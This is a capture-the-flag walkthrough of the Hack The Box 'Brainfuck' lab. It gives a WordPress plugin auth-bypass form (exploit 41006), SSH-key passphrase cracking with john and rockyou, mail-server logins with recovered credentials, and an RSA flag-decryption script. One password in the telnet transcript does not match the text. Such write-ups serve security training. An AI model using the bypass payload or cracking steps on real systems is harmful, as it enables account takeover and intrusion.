HTB – Brainfuck

Today we are going to solve another CTF challenge “Brainfuck” which is retired vulnerable lab presented by Hack the Box for making online penetration testing practices according to your experience level. Although in this challenge you can test your expertise by WordPress penetration testing and how much knowledge you have in cryptography by decrypting any encryption that you will get in this lab.

Level: Hard

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.17 so let’s begin with nmap port enumeration.

root@kali:~/htb/brainfuck# nmap -sC -sV 
# Nmap 7.70 scan initiated Mon Dec 10 03:28:38 2018 as: nmap -sC -sV -oA nmap 10.10.10.17
Nmap scan report for 10.10.10.17
Host is up (0.026s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) UIDL USER AUTH-RESP-CODE RESP-CODES PIPELINING CAPA TOP
143/tcp open imap Dovecot imapd
|_imap-capabilities: LITERAL+ IMAP4rev1 AUTH=PLAINA0001 have IDLE OK LOGIN-REFERRALS ID post-login ENABLE Pre-login listed capabilities more SASL-IR
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_ http/1.1
| tls-nextprotoneg: 
|_ http/1.1
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 10 03:29:42 2018 -- 1 IP address (1 host up) scanned in 63.30 seconds

From given above image, you can observe we found so many ports are open such as 22,25 and so on in victim’s network and moreover I got three domain names as highlighted

Now the next option was to add target IP inside /etc/host file since port 443 was open containing three domain names obtained from scanning result thus I edit sup3rs3cr3t.brainfuck.htb www.brainfuck.htb  brainfuck.htb as host name.

Then I  explored all three domain names one by one in web browser but when I explored https://brainfuck.htb found following webpage page which was indicating that it is a wordpress site and pointing toward SMTP mail Id orestis@brainfuck.htb as highlighted in below image.

Now we decided to use wpscan  on the target URL, that we have entered in the browser. To check if there are any kind of vulnerable themes, plugins, username and etc.

root@kali:~/htb/brainfuck# sudo wpscan --url https://brainfuck.htb --disable-tls-checks
root@kali:~/htb/brainfuck# sudo wpscan --url https://brainfuck.htb --disable-tls-checks --enumerate u

From wpscan result I grabbed the vulnerability in wordpress plug-in “support plus responsive ticket system” for Remote code execution as highlighted below.

Moreover it dumped two login user name “admin & administrator

With help of Google I search associated exploit for compromising victim’s credential and found exploit 41006 as shown below.

Inside this I saw html form code for remote code execution, now copy it and paste it into a text document.

Here please notice the changes I had made by adding “value: admin as username and orestis@brainfuck as email and target URL in action https://brainfuck” and saved it as wp.html on desktop.

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="admin">
<input type="hidden" name="email" value="orestis@brainfuck.htb">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>

Then I run Python script for file transfer via port 8000.

c:\Python37>python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
127.0.0.1 - - [10/Dec/2018 12:13:54] code 404, message File not found
127.0.0.1 - - [10/Dec/2018 12:13:54] "GET /favicon.ico HTTP/1.1" 404 -
127.0.0.1 - - [10/Dec/2018 12:14:05] "GET /wp.html HTTP/1.1" 304 -
192.168.178.16 - - [10/Dec/2018 12:59:01] "GET /id_rsa HTTP/1.1" 200 -

Then explore wp.html file in localhost server as shown below and click on login tab.

 

By doing so You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().Then you can go to admin panel by visiting https://brainfuck.htb once again.

 

 

Inside admin dashboard I looked at plugin for further step where I found SMTP plug-in.

It was terrific moment when I saw user authentication login are filled in text field. So I read username “orestis” but password was in bold character, which I need to convert in plain text using inspect element.

Wonderful!! Here is orestis plain text password value kIEnnfEKJ#9UmdO , let’s use them for smtp login.

 

Through telnet command: telnet 10.10.10.17 110 we established connection with SMTP server and login into orestis account, now for reading orestis inbox messages I ran retr 1 command but didn’t get any useful message and move to another message by running retr 2.

telnet 10.10.10.17 110
+OK Dovecot ready.
user orestis
+OK
pass kHGuERB29DNiNE+OK Logged in.
retr 2
+OK 514 octets
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)

Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Regards

Here I found something very crucial that there is username and password for any “Secret” forum for login and after deep-thinking I realized this credential could be connected to sup3rs3cr3t.brainfuck.htb which I had explored in web browser.

Again I explore https:\\sup3rs3cr3t.brainfuck.htb then submit above found credential and got successful login.

It showing super-secret forum which is pointing towards any secret discussion chat inside “Key” and “SSH Access”

Inside “Key” I notice chatting between admin and orestis which was going beyond my sense. Might be orestis and admin are sharing some confidential information in this secret chat but in last reply of admin it looked like he is secretly sharing any encrypted URL.

Then I open “ssh access” Ahhhh!!! It was an English conversation where admin is giving suggestion to use Key for login instead of simple password. And by reading all conversation I concluded that orestis has lost SSH login key and asking admin to send the key in an encrypted chat that we saw above “Key” (secret discussion).

Time to decrypt their conversation for getting ssh login key but don’t know from where to start. After spending so much time and efforts at last I successfully decrypted and found ssh login key.

Now you’re Question: How it become possible?

And my answer is: observe the given below step carefully:

From both chat “Key” and “ssh access” I copied following text into a text file respectively and removed the space provided between the word as shown in below.

Pieagnm - Jkoijeg nbw zwx mle grwsnn (message in cipher text)

Orestis - Hacking for fun and profit (decrypt key in plain text)
Considering cipher text is encrypted information and plaintext as decrypting key.

With help of online decipher I had pasted above cipher text inside encipher textbox and decryption key inside decipher textbox and received decipher message“BrainfuCkmybrainfuckmybrainfu”

If you remember we had obtained encrypted URL from inside “Key” discussion, go for its decryption using above decipher message “fuckmybrain” as decrypting key. It took much time to identify proper encryption algorithm used for encrypting URL and we have successfully decrypt it with the help Vigerner cipher. It gave a plaintext URL for downloading id_rsa for ssh login as orestis.

From given below image you can observe that I have added encrypted URL in encrypted text field and used “fuckmybrain” as decrypting key and obtain Plain text URL.

Path to download key is: https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa

When I tried to open this file, then found that it required password to view its content.

Formerly I download a python script from

https://github.com/truongkma/ctf-tools/blob/master/John/run/sshng2john.py

for cracking the password of this file. Then I ran following command and got desired output.

root@kali:~/htb/brainfuck# python sshng2john.py id_rsa > rsa2john.txt
root@kali:~/htb/brainfuck# john rsa2john.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH-ng [RSA/DSA 32/64])
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
3poulakia! (id_rsa)
1g 0:00:00:30 DONE (2018-12-10 09:33) 0.03302g/s 473698p/s 473698c/s 473698C/s *7¡Vamos!
Session completed

And without wasting time I executed following command for login into SSH using 3poulakia! as password.

root@kali:~/htb/brainfuck# ssh -i id_rsa orestis@10.10.10.17

Great!!  I logged in successfully, now let’s finish the task by grabbing user.txt and root.txt file. First I checked for available files in current directory which are inside it.

Apart from user.txt I found three more files in this directory and when I open these file I got hint for Root Flag! Now follow below steps if you are also looking for root flag.

When I read content of encrypt.sage, it was pointing towards encrypted password within debug.txt and output.txt

When I open debug.txt and output.txt, here I saw encrypted information then again I chased towards Google for any help in such type of encryption and luckily found a decrypting script from this link: http://dann.com.br/alexctf2k17-crypto150-what_is_this_encryption/ and after that copied entire script into text file for decryption.

As describe in crypto150 algorithm I placed 1st, 2nd & 3rd line of debug.txt equal to p, q, e respectively. Ct is equal to content of output.txt as shown below and saved it as decrypt.py

root@kali:~/htb/brainfuck# cat decrypt.py 
#!/usr/bin/python
## RSA - Given p,q and e.. recover and use private key w/ Extended Euclidean Algorithm - crypto150-what_is_this_encryption @ alexctf 2017
# @author intrd - http://dann.com.br/ (original script here: http://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

import binascii, base64

p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

def egcd(a, b):
    x,y, u,v = 0,1, 1,0
    while a != 0:
        q, r = b//a, b%a
        m, n = x-u*q, y-v*q
        b,a, x,y, u,v = a,r, u,v, m,n
        gcd = b
    return gcd, x, y

n = p*q #product of primes
phi = (p-1)*(q-1) #modular multiplicative inverse
gcd, a, b = egcd(e, phi) #calling extended euclidean algorithm
d = a #a is decryption key

out = hex(d)
print("d_hex: " + str(out));
print("n_dec: " + str(d));

pt = pow(ct, d, n)
print("pt_dec: " + str(pt))

out = hex(pt)
out = str(out[2:-1])
print "flag"
print out.decode("hex")

root@kali:~/htb/brainfuck# python decrypt.py 
d_hex: 0xc6eccf2d2584044e2173cf0efa88f839ee184df56ce3e6aa450cfcdf9e5ec8b4d8123c2cd57ee4bf7c84e423941191ec57a7944e31327a722143edc1981ecf24bd9b389d673a1bd44288103e501f46994b700ac1abcb15339ff0750566957064605eb9205d159360fb6b907b39ee98683b0f6f418619fcb1665c4c7fa7984e9L
n_dec: 8730619434505424202695243393110875299824837916005183495711605871599704226978295096241357277709197601637267370957300267235576794588910779384003565449171336685547398771618018696647404657266705536859125227436228202269747809884438885837599321762997276849457397006548009824608365446626232570922018165610149151977
pt_dec: 24604052029401386049980296953784287079059245867880966944246662849341507003750
flag
6ef*****b8ef


we have completed the challenge successfully.

Author: Jacco Straathof

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *